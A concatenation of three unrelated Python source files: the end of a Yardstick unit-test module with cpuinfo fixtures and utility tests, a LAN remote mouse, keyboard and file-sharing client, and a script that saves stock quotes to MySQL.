flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4411.31
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 44
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1200.305
cache size : 56320 KB
physical id : 0
siblings : 44
core id : 0
cpu cores : 22
apicid : 1
initial apicid : 1
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4410.61
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 85
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1200.573
cache size : 56320 KB
physical id : 1
siblings : 44
core id : 26
cpu cores : 22
apicid : 117
initial apicid : 117
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4409.07
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 86
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1200.305
cache size : 56320 KB
physical id : 1
siblings : 44
core id : 27
cpu cores : 22
apicid : 119
initial apicid : 119
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4406.62
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
processor : 87
vendor_id : GenuineIntel
cpu family : 6
model : 79
model name : Intel(R) Xeon(R) CPU E5-2699 v4 @ 2.20GHz
stepping : 1
microcode : 0xb00001f
cpu MHz : 1200.708
cache size : 56320 KB
physical id : 1
siblings : 44
core id : 28
cpu cores : 22
apicid : 121
initial apicid : 121
fpu : yes
fpu_exception : yes
cpuid level : 20
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch epb cat_l3 cdp_l3 intel_ppin intel_pt tpr_shadow vnmi flexpriority ept vpid fsgsbase tsc_adjust bmi1 hle avx2 smep bmi2 erms invpcid rtm cqm rdt_a rdseed adx smap xsaveopt cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local dtherm ida arat pln pts
bugs :
bogomips : 4413.48
clflush size : 64
cache_alignment : 64
address sizes : 46 bits physical, 48 bits virtual
power management:
"""
socket_map = utils.SocketTopology.parse_cpuinfo(cpuinfo)
processors = socket_map.processors()
self.assertEqual(processors, [1, 2, 43, 44, 85, 86, 87])
cores = socket_map.cores()
self.assertEqual(cores, [0, 1, 2, 26, 27, 28])
sockets = socket_map.sockets()
self.assertEqual(sockets, [0, 1])
class ChangeObjToDictTestCase(ut_base.BaseUnitTestCase):
def test_change_obj_to_dict(self):
class A(object):
def __init__(self):
self.name = 'yardstick'
obj = A()
obj_r = utils.change_obj_to_dict(obj)
obj_s = {'name': 'yardstick'}
self.assertEqual(obj_r, obj_s)
class SetDictValueTestCase(ut_base.BaseUnitTestCase):
def test_set_dict_value(self):
input_dic = {
'hello': 'world'
}
output_dic = utils.set_dict_value(input_dic, 'welcome.to', 'yardstick')
self.assertEqual(output_dic.get('welcome', {}).get('to'), 'yardstick')
class RemoveFileTestCase(ut_base.BaseUnitTestCase):
def test_remove_file(self):
try:
utils.remove_file('notexistfile.txt')
except Exception as e: # pylint: disable=broad-except
# NOTE(ralonsoh): to narrow the scope of this exception.
self.assertTrue(isinstance(e, OSError))
class ParseIniFileTestCase(ut_base.BaseUnitTestCase):
def setUp(self):
self._mock_config_parser_type = mock.patch.object(configparser,
'ConfigParser')
self.mock_config_parser_type = self._mock_config_parser_type.start()
self.addCleanup(self._stop_mocks)
def _stop_mocks(self):
self._mock_config_parser_type.stop()
def test_parse_ini_file(self):
defaults = {'default1': 'value1',
'default2': 'value2'}
s1 = {'key1': 'value11',
'key2': 'value22'}
s2 = {'key1': 'value123',
'key2': 'value234'}
mock_config_parser = mock.Mock()
self.mock_config_parser_type.return_value = mock_config_parser
mock_config_parser.read.return_value = True
mock_config_parser.sections.return_value = ['s1', 's2']
mock_config_parser.items.side_effect = iter([
defaults.items(),
s1.items(),
s2.items(),
])
expected = {'DEFAULT': defaults,
's1': s1,
's2': s2}
result = utils.parse_ini_file('my_path')
self.assertDictEqual(expected, result)
@mock.patch.object(utils, 'logger')
def test_parse_ini_file_missing_section_header(self, *args):
mock_config_parser = mock.Mock()
self.mock_config_parser_type.return_value = mock_config_parser
mock_config_parser.read.side_effect = (
configparser.MissingSectionHeaderError(
mock.Mock(), 321, mock.Mock()))
with self.assertRaises(configparser.MissingSectionHeaderError):
utils.parse_ini_file('my_path')
def test_parse_ini_file_no_file(self):
mock_config_parser = mock.Mock()
self.mock_config_parser_type.return_value = mock_config_parser
mock_config_parser.read.return_value = False
with self.assertRaises(RuntimeError):
utils.parse_ini_file('my_path')
def test_parse_ini_file_no_default_section_header(self):
s1 = {'key1': 'value11',
'key2': 'value22'}
s2 = {'key1': 'value123',
'key2': 'value234'}
mock_config_parser = mock.Mock()
self.mock_config_parser_type.return_value = mock_config_parser
mock_config_parser.read.return_value = True
mock_config_parser.sections.return_value = ['s1', 's2']
mock_config_parser.items.side_effect = iter([
configparser.NoSectionError(mock.Mock()),
s1.items(),
s2.items(),
])
expected = {'DEFAULT': {},
's1': s1,
's2': s2}
result = utils.parse_ini_file('my_path')
self.assertDictEqual(expected, result)
class TestUtils(ut_base.BaseUnitTestCase):
@mock.patch('yardstick.common.utils.os.makedirs')
def test_makedirs(self, *_):
self.assertIsNone(utils.makedirs('a/b/c/d'))
@mock.patch('yardstick.common.utils.os.makedirs')
def test_makedirs_exists(self, mock_os_makedirs):
mock_os_makedirs.side_effect = OSError(errno.EEXIST, 'exists')
self.assertIsNone(utils.makedirs('a/b/c/d'))
@mock.patch('yardstick.common.utils.os.makedirs')
def test_makedirs_busy(self, mock_os_makedirs):
mock_os_makedirs.side_effect = OSError(errno.EBUSY, 'busy')
with self.assertRaises(OSError):
utils.makedirs('a/b/c/d')
@mock.patch('yardstick.common.utils.jsonify')
def test_result_handler(self, mock_jsonify):
mock_jsonify.return_value = 432
self.assertEqual(utils.result_handler('x', 234), 432)
mock_jsonify.assert_called_once_with({'status': 'x', 'result': 234})
@mock.patch('random.randint')
@mock.patch('socket.socket')
def test_get_free_port(self, mock_socket, mock_randint):
mock_randint.return_value = 7777
s = mock_socket('x', 'y')
s.connect_ex.side_effect = iter([0, 1])
result = utils.get_free_port('10.20.30.40')
self.assertEqual(result, 7777)
self.assertEqual(s.connect_ex.call_count, 2)
@mock.patch('subprocess.check_output')
def test_execute_command(self, mock_check_output):
expected = ['hello world', '1234']
mock_check_output.return_value = os.linesep.join(expected)
result = utils.execute_command('my_command arg1 arg2')
self.assertEqual(result, expected)
@mock.patch('subprocess.Popen')
def test_source_env(self, mock_popen):
base_env = deepcopy(os.environ)
mock_process = mock_popen()
output_list = [
'garbage line before',
'NEW_ENV_VALUE=234',
'garbage line after',
]
mock_process.communicate.return_value = os.linesep.join(output_list), '', 0
expected = {'NEW_ENV_VALUE': '234'}
result = utils.source_env('my_file')
self.assertDictEqual(result, expected)
os.environ.clear()
os.environ.update(base_env)
@mock.patch.object(configparser, 'ConfigParser')
def test_parse_ini_file(self, mock_config_parser_type):
defaults = {
'default1': 'value1',
'default2': 'value2',
}
s1 = {
'key1': 'value11',
'key2': 'value22',
}
s2 = {
'key1': 'value123',
'key2': 'value234',
}
mock_config_parser = mock_config_parser_type()
mock_config_parser.read.return_value = True
mock_config_parser.sections.return_value = ['s1', 's2']
mock_config_parser.items.side_effect = iter([
defaults.items(),
s1.items(),
s2.items(),
])
expected = {
'DEFAULT': defaults,
's1': s1,
's2': s2,
}
result = utils.parse_ini_file('my_path')
self.assertDictEqual(result, expected)
@mock.patch.object(utils, 'logger')
@mock.patch.object(configparser, 'ConfigParser')
def test_parse_ini_file_missing_section_header(
self, mock_config_parser_type, *args):
mock_config_parser = mock_config_parser_type()
mock_config_parser.read.side_effect = (
configparser.MissingSectionHeaderError(mock.Mock(), 321,
mock.Mock()))
with self.assertRaises(configparser.MissingSectionHeaderError):
utils.parse_ini_file('my_path')
@mock.patch.object(configparser, 'ConfigParser')
def test_parse_ini_file_no_file(self, mock_config_parser_type):
mock_config_parser = mock_config_parser_type()
mock_config_parser.read.return_value = False
with self.assertRaises(RuntimeError):
utils.parse_ini_file('my_path')
@mock.patch.object(configparser, 'ConfigParser')
def test_parse_ini_file_no_default_section_header(self, mock_config_parser_type):
s1 = {
'key1': 'value11',
'key2': 'value22',
}
s2 = {
'key1': 'value123',
'key2': 'value234',
}
mock_config_parser = mock_config_parser_type()
mock_config_parser.read.return_value = True
mock_config_parser.sections.return_value = ['s1', 's2']
mock_config_parser.items.side_effect = iter([
configparser.NoSectionError(mock.Mock()),
s1.items(),
s2.items(),
])
expected = {
'DEFAULT': {},
's1': s1,
's2': s2,
}
result = utils.parse_ini_file('my_path')
self.assertDictEqual(result, expected)
def test_join_non_strings(self):
self.assertEqual(utils.join_non_strings(':'), '')
self.assertEqual(utils.join_non_strings(':', 'a'), 'a')
self.assertEqual(utils.join_non_strings(':', 'a', 2, 'c'), 'a:2:c')
self.assertEqual(utils.join_non_strings(':', ['a', 2, 'c']), 'a:2:c')
self.assertEqual(utils.join_non_strings(':', 'abc'), 'abc')
def test_validate_non_string_sequence(self):
self.assertEqual(utils.validate_non_string_sequence([1, 2, 3]), [1, 2, 3])
self.assertIsNone(utils.validate_non_string_sequence('123'))
self.assertIsNone(utils.validate_non_string_sequence(1))
self.assertEqual(utils.validate_non_string_sequence(1, 2), 2)
self.assertEqual(utils.validate_non_string_sequence(1, default=2), 2)
with self.assertRaises(RuntimeError):
utils.validate_non_string_sequence(1, raise_exc=RuntimeError)
class TestUtilsIpAddrMethods(ut_base.BaseUnitTestCase):
GOOD_IP_V4_ADDRESS_STR_LIST = [
u'0.0.0.0',
u'10.20.30.40',
u'127.0.0.1',
u'10.20.30.40',
u'172.29.50.75',
u'192.168.230.9',
u'255.255.255.255',
]
GOOD_IP_V4_MASK_STR_LIST = [
u'/1',
u'/8',
u'/13',
u'/19',
u'/24',
u'/32',
]
GOOD_IP_V6_ADDRESS_STR_LIST = [
u'::1',
u'fe80::250:56ff:fe89:91ff',
u'123:4567:89ab:cdef:123:4567:89ab:cdef',
]
GOOD_IP_V6_MASK_STR_LIST = [
u'/1',
u'/16',
u'/29',
u'/64',
u'/99',
u'/128',
]
INVALID_IP_ADDRESS_STR_LIST = [
1,
u'w.x.y.z',
u'10.20.30.40/33',
u'123:4567:89ab:cdef:123:4567:89ab:cdef/129',
]
def test_make_ipv4_address(self):
for addr in self.GOOD_IP_V4_ADDRESS_STR_LIST:
# test with no mask
expected = ipaddress.IPv4Address(addr)
self.assertEqual(utils.make_ipv4_address(addr), expected, addr)
def test_make_ipv4_address_error(self):
addr_list = self.INVALID_IP_ADDRESS_STR_LIST +\
self.GOOD_IP_V6_ADDRESS_STR_LIST
for addr in addr_list:
self.assertRaises(Exception, utils.make_ipv4_address, addr)
def test_safe_ip_address(self):
addr_list = self.GOOD_IP_V4_ADDRESS_STR_LIST
for addr in addr_list:
# test with no mask
expected = ipaddress.ip_address(addr)
self.assertEqual(utils.safe_ip_address(addr), expected, addr)
def test_safe_ip_address_v6_ip(self):
addr_list = self.GOOD_IP_V6_ADDRESS_STR_LIST
for addr in addr_list:
# test with no mask
expected = ipaddress.ip_address(addr)
self.assertEqual(utils.safe_ip_address(addr), expected, addr)
@mock.patch("yardstick.common.utils.logging")
def test_safe_ip_address_negative(self, *args):
# NOTE(ralonsoh): check the calls to mocked functions.
for value in self.INVALID_IP_ADDRESS_STR_LIST:
self.assertIsNone(utils.safe_ip_address(value), value)
addr_list = self.GOOD_IP_V4_ADDRESS_STR_LIST
mask_list = self.GOOD_IP_V4_MASK_STR_LIST
for addr_mask_pair in product(addr_list, mask_list):
value = ''.join(addr_mask_pair)
self.assertIsNone(utils.safe_ip_address(value), value)
addr_list = self.GOOD_IP_V6_ADDRESS_STR_LIST
mask_list = self.GOOD_IP_V6_MASK_STR_LIST
for addr_mask_pair in product(addr_list, mask_list):
value = ''.join(addr_mask_pair)
self.assertIsNone(utils.safe_ip_address(value), value)
def test_get_ip_version(self):
addr_list = self.GOOD_IP_V4_ADDRESS_STR_LIST
for addr in addr_list:
# test with no mask
self.assertEqual(utils.get_ip_version(addr), 4, addr)
def test_get_ip_version_v6_ip(self):
addr_list = self.GOOD_IP_V6_ADDRESS_STR_LIST
for addr in addr_list:
# test with no mask
self.assertEqual(utils.get_ip_version(addr), 6, addr)
@mock.patch("yardstick.common.utils.logging")
def test_get_ip_version_negative(self, *args):
# NOTE(ralonsoh): check the calls to mocked functions.
for value in self.INVALID_IP_ADDRESS_STR_LIST:
self.assertIsNone(utils.get_ip_version(value), value)
addr_list = self.GOOD_IP_V4_ADDRESS_STR_LIST
mask_list = self.GOOD_IP_V4_MASK_STR_LIST
for addr_mask_pair in product(addr_list, mask_list):
value = ''.join(addr_mask_pair)
self.assertIsNone(utils.get_ip_version(value), value)
addr_list = self.GOOD_IP_V6_ADDRESS_STR_LIST
mask_list = self.GOOD_IP_V6_MASK_STR_LIST
for addr_mask_pair in product(addr_list, mask_list):
value = ''.join(addr_mask_pair)
self.assertIsNone(utils.get_ip_version(value), value)
def test_ip_to_hex(self):
self.assertEqual(utils.ip_to_hex('0.0.0.0'), '00000000')
self.assertEqual(utils.ip_to_hex('10.20.30.40'), '0a141e28')
self.assertEqual(utils.ip_to_hex('127.0.0.1'), '7f000001')
self.assertEqual(utils.ip_to_hex('172.31.90.100'), 'ac1f5a64')
self.assertEqual(utils.ip_to_hex('192.168.254.253'), 'c0a8fefd')
self.assertEqual(utils.ip_to_hex('255.255.255.255'), 'ffffffff')
def test_ip_to_hex_v6_ip(self):
for value in self.GOOD_IP_V6_ADDRESS_STR_LIST:
self.assertEqual(utils.ip_to_hex(value), value)
@mock.patch("yardstick.common.utils.logging")
def test_ip_to_hex_negative(self, *args):
# NOTE(ralonsoh): check the calls to mocked functions.
addr_list = self.GOOD_IP_V4_ADDRESS_STR_LIST
mask_list = self.GOOD_IP_V4_MASK_STR_LIST
value_iter = (''.join(pair) for pair in product(addr_list, mask_list))
for value in chain(value_iter, self.INVALID_IP_ADDRESS_STR_LIST):
self.assertEqual(utils.ip_to_hex(value), value)
def test_get_mask_from_ip_range_ipv4(self):
ip_str = '1.1.1.1'
for mask in range(8, 30):
ip = ipaddress.ip_network(ip_str + '/' + str(mask), strict=False)
result = utils.get_mask_from_ip_range(ip[2], ip[-2])
self.assertEqual(mask, result)
def test_get_mask_from_ip_range_ipv6(self):
ip_str = '2001::1'
for mask in range(8, 120):
ip = ipaddress.ip_network(ip_str + '/' + str(mask), strict=False)
result = utils.get_mask_from_ip_range(ip[2], ip[-2])
self.assertEqual(mask, result)
class SafeDecodeUtf8TestCase(ut_base.BaseUnitTestCase):
@unittest.skipIf(six.PY2,
'This test should only be launched with Python 3.x')
def test_safe_decode_utf8(self):
_bytes = b'this is a byte array'
out = utils.safe_decode_utf8(_bytes)
self.assertIs(type(out), str)
self.assertEqual('this is a byte array', out)
class ReadMeminfoTestCase(ut_base.BaseUnitTestCase):
MEMINFO = (b'MemTotal: 65860500 kB\n'
b'MemFree: 28690900 kB\n'
b'MemAvailable: 52873764 kB\n'
b'Active(anon): 3015676 kB\n'
b'HugePages_Total: 8\n'
b'Hugepagesize: 1048576 kB')
MEMINFO_DICT = {'MemTotal': '65860500',
'MemFree': '28690900',
'MemAvailable': '52873764',
'Active(anon)': '3015676',
'HugePages_Total': '8',
'Hugepagesize': '1048576'}
def test_read_meminfo(self):
ssh_client = ssh.SSH('user', 'host')
with mock.patch.object(ssh_client, 'get_file_obj') as \
mock_get_client, \
mock.patch.object(six, 'BytesIO',
return_value=six.BytesIO(self.MEMINFO)):
output = utils.read_meminfo(ssh_client)
mock_get_client.assert_called_once_with('/proc/meminfo', mock.ANY)
self.assertEqual(self.MEMINFO_DICT, output)
class TimerTestCase(ut_base.BaseUnitTestCase):
def test__getattr(self):
with utils.Timer() as timer:
time.sleep(1)
self.assertEqual(1, round(timer.total_seconds(), 0))
self.assertEqual(1, timer.delta.seconds)
def test__enter_with_timeout(self):
with utils.Timer(timeout=10) as timer:
time.sleep(1)
self.assertEqual(1, round(timer.total_seconds(), 0))
def test__enter_with_timeout_exception(self):
with self.assertRaises(exceptions.TimerTimeout):
with utils.Timer(timeout=1):
time.sleep(2)
def test__enter_with_timeout_no_exception(self):
with utils.Timer(timeout=1, raise_exception=False):
time.sleep(2)
def test__iter(self):
iterations = []
for i in utils.Timer(timeout=2):
iterations.append(i)
time.sleep(1.1)
self.assertEqual(2, len(iterations))
def test_delta_time_sec(self):
with utils.Timer() as timer:
self.assertIsInstance(timer.delta_time_sec(), float)
class WaitUntilTrueTestCase(ut_base.BaseUnitTestCase):
def test_no_timeout(self):
self.assertIsNone(utils.wait_until_true(lambda: True,
timeout=1, sleep=1))
def test_timeout_generic_exception(self):
with self.assertRaises(exceptions.WaitTimeout):
self.assertIsNone(utils.wait_until_true(lambda: False,
timeout=1, sleep=1))
def test_timeout_given_exception(self):
class MyTimeoutException(exceptions.YardstickException):
message = 'My timeout exception'
with self.assertRaises(MyTimeoutException):
self.assertIsNone(
utils.wait_until_true(lambda: False, timeout=1, sleep=1,
exception=MyTimeoutException))
def _run_thread(self):
with self.assertRaises(exceptions.WaitTimeout):
utils.wait_until_true(lambda: False, timeout=1, sleep=1)
def test_timeout_no_main_thread(self):
new_thread = threading.Thread(target=self._run_thread)
new_thread.start()
new_thread.join(timeout=3)
class SendSocketCommandTestCase(unittest.TestCase):
@mock.patch.object(socket, 'socket')
def test_execute_correct(self, mock_socket):
mock_socket_obj = mock.Mock()
mock_socket_obj.connect_ex.return_value = 0
mock_socket.return_value = mock_socket_obj
self.assertEqual(0, utils.send_socket_command('host', 22, 'command'))
mock_socket.assert_called_once_with(socket.AF_INET, socket.SOCK_STREAM)
mock_socket_obj.connect_ex.assert_called_once_with(('host', 22))
mock_socket_obj.sendall.assert_called_once_with(six.b('command'))
mock_socket_obj.close.assert_called_once()
@mock.patch.object(socket, 'socket')
def test_execute_exception(self, mock_socket):
mock_socket_obj = mock.Mock()
mock_socket_obj.connect_ex.return_value = 0
mock_socket.return_value = mock_socket_obj
mock_socket_obj.sendall.side_effect = socket.error
self.assertEqual(1, utils.send_socket_command('host', 22, 'command'))
mock_socket.assert_called_once_with(socket.AF_INET, socket.SOCK_STREAM)
mock_socket_obj.connect_ex.assert_called_once_with(('host', 22))
mock_socket_obj.sendall.assert_called_once_with(six.b('command'))
mock_socket_obj.close.assert_called_once()
class GetPortMacTestCase(unittest.TestCase):
def setUp(self):
self.ssh_client = mock.Mock()
self.ssh_client.execute.return_value = (0, 'foo ', '')
def test_ssh_client_execute_called(self):
utils.get_port_mac(self.ssh_client, 99)
self.ssh_client.execute.assert_called_once_with(
"ifconfig |grep HWaddr |grep 99 |awk '{print $5}' ",
raise_on_error=True)
def test_return_value(self):
self.assertEqual('foo', utils.get_port_mac(self.ssh_client, 99))
class GetPortIPTestCase(unittest.TestCase):
def setUp(self):
self.ssh_client = mock.Mock()
self.ssh_client.execute.return_value = (0, 'foo ', '')
def test_ssh_client_execute_called(self):
utils.get_port_ip(self.ssh_client, 99)
self.ssh_client.execute.assert_called_once_with(
"ifconfig 99 |grep 'inet addr' |awk '{print $2}' |cut -d ':' -f2 ",
raise_on_error=True)
def test_return_value(self):
self.assertEqual('foo', utils.get_port_ip(self.ssh_client, 99))
class SafeCaseTestCase(unittest.TestCase):
def test_correct_type_int(self):
self.assertEqual(35, utils.safe_cast('35', int, 0))
def test_correct_int_as_string(self):
self.assertEqual(25, utils.safe_cast('25', 'int', 0))
def test_incorrect_type_as_string(self):
with self.assertRaises(exceptions.InvalidType):
utils.safe_cast('100', 'intt', 0)
def test_default_value(self):
self.assertEqual(0, utils.safe_cast('', 'int', 0))
class SetupHugepagesTestCase(unittest.TestCase):
@mock.patch.object(six, 'BytesIO', return_value=six.BytesIO(b'5\n'))
@mock.patch.object(utils, 'read_meminfo',
return_value={'Hugepagesize': '1024'})
def test_setup_hugepages(self, mock_meminfo, *args):
ssh = mock.Mock()
ssh.execute = mock.Mock()
hp_size_kb, hp_number, hp_number_set = utils.setup_hugepages(ssh, 10 * 1024)
mock_meminfo.assert_called_once_with(ssh)
ssh.execute.assert_called_once_with(
'echo 10 | sudo tee /proc/sys/vm/nr_hugepages')
self.assertEqual(hp_size_kb, 1024)
self.assertEqual(hp_number, 10)
self.assertEqual(hp_number_set, 5)
|
Client.py | #!/usr/bin/env python
# coding: utf-8
# In[9]:
from pymouse import PyMouse
from pykeyboard import PyKeyboard
import socket
import os
os.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = "hide"
import pygame
import sys
import threading
from tkinter import *
from tkinter import filedialog
# In[ ]:
IP = [l for l in ([ip for ip in socket.gethostbyname_ex(socket.gethostname())[2]
if not ip.startswith("127.")][:1], [[(s.connect(('8.8.8.8', 53)),
s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET,
socket.SOCK_DGRAM)]][0][1]]) if l][0][0]
SERVERIP = ""
# In[ ]:
os.environ["SDL_VIDEO_WINDOW_POS"] = "0,0"
PORT = 12345
HOSTNAME = socket.gethostname()
RES = PyMouse().screen_size()
# In[ ]:
def cls():
os.system('cls' if os.name=='nt' else 'clear')
# In[ ]:
def sendfile(file, ClientIP):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ClientIP,PORT))
f = open(file, "rb")
part = f.read(1024)
while part:
s.sendall(part)
part = f.read(1024)
f.close()
s.close()
cls()
print(file.split("/")[-1], "has been sent!")
# In[ ]:
def receivefile(file):
count = 1
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((IP, PORT))
s.listen()
while True:
conn, addr = s.accept()
f = open(file + str(count),'wb')
while True:
bytepart = conn.recv(1024)
if not bytepart:
break
f.write(bytepart)
f.flush()
f.close()
conn.close()
count += 1
print("\nA file has been received")
s.close()
# In[ ]:
def selectFile():
root = Tk()
root.withdraw()
file_path = filedialog.askopenfilename()
return file_path
# In[ ]:
def broadcast():
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('',0))
sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
sock.sendto((IP + "|" + HOSTNAME + "|" + str(RES[0]) + "," + str(RES[1])).encode(), ('<broadcast>', PORT))
sock.close()
# In[ ]:
while True:
try:
print("[0] Broadcast")
print("[1] Start Listening")
print("[2] Quit")
sel = int(input("Make selection: "))
if sel == 0:
cls()
broadcast()
elif sel == 1:
cls()
break
elif sel == 2:
cls()
sys.exit()
except (ValueError, TypeError):
cls()
continue
# In[ ]:
def recvInput():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind((IP, PORT))
data, addr = s.recvfrom(20)
global SERVERIP
SERVERIP = addr[0]
pygame.init()
screen = pygame.display.set_mode((1920,1080), pygame.NOFRAME)
screen = pygame.display.set_mode((1920,1080), pygame.NOFRAME)
pygame.display.set_icon(pygame.image.load('assets/icon.png'))
pygame.display.iconify()
while True:
data, addr = s.recvfrom(20)
data = data.decode().split(",")
if len(data) == 3:
pygame.mouse.set_pos(int(data[1]),int(data[2]))
elif len(data) == 4:
if data[0] == "P":
PyMouse().press(int(data[1]), int(data[2]), int(data[3]))
else:
PyMouse().release(int(data[1]), int(data[2]), int(data[3]))
else:
if data[0] == "P":
PyKeyboard().press_key(int(data[1]))
else:
PyKeyboard().release_key(int(data[1]))
except:
s.close()
pygame.quit()
# In[ ]:
recvThread = threading.Thread(name="recvInput", target=recvInput)
recvThread.start()
recvFile = threading.Thread(name="receivefile", target=receivefile,args=("receivedFile",))
recvFile.start()
# In[ ]:
while True:
input("Press Enter to Share File")
path = selectFile()
if not path == '':
sendfile(path, SERVERIP)
|
test3.py | import easyquotation
from util import mysqlUtil
from time import strftime, localtime
quotation = easyquotation.use('sina') # 新浪 ['sina'] 腾讯 ['tencent', 'qq']
# 异步获取股票数组数据
def get_real_and_save(stockCodeList):
stockRealInfoList = quotation.get_stock_data(stockCodeList)
# 将数据插入到DB中
for stockRealInfo in stockRealInfoList:
v = stockRealInfoList[stockRealInfo]
mysqlUtil.insertTickData(stockRealInfo, None, v['buy'], v['sell'], v['now'], v['open'], v['close'],
v['high'], v['low'], v['turnover'], v['volume'], v['ask1'], v['ask1_volume'], v['ask2'],
v['ask2_volume'], v['ask3'], v['ask3_volume'], v['ask4'], v['ask4_volume'], v['ask5'],
v['ask5_volume'], v['bid1'], v['bid1_volume'], v['bid2'], v['bid2_volume'], v['bid3'],
v['bid3_volume'], v['bid4'], v['bid4_volume'], v['bid5'], v['bid5_volume'], v['date'],
v['time'], None)
# 切割数组
def list_split(items, n):
return [items[i:i+n] for i in range(0, len(items), n)]
# quotation.market_snapshot(prefix=True) # prefix 参数指定返回的行情字典中的股票代码 key 是否带 sz/sh 前缀
print('mysql耗时')
print(strftime("%Y-%m-%d %H:%M:%S", localtime()))
stockCodeInfo = mysqlUtil.getStockList()
# for stockInfo in stockList:
# print(stockInfo[0])
# stockInfo = quotation.real(stockInfo[0]) # 支持直接指定前缀,如 'sh000001'
# stockCodeList = []
#
# for stockInfo in stockList:
# stockCodeList.append(str(stockInfo))
#
# stockCodeList = ['sz000001','sz000002','sz000004','sz000005','sz000006']
print('代码拼接处理耗时')
print(strftime("%Y-%m-%d %H:%M:%S", localtime()))
i = 0
stockCodeList = []
for stockCode in stockCodeInfo:
i = i+1
if i==1000:
break
stockCodeList.append(easyquotation.helpers.get_stock_type(stockCode[0]) + stockCode[0])
# stockPartList = list_split(stockCodeList, 7000)
# for stockPart in stockPartList:
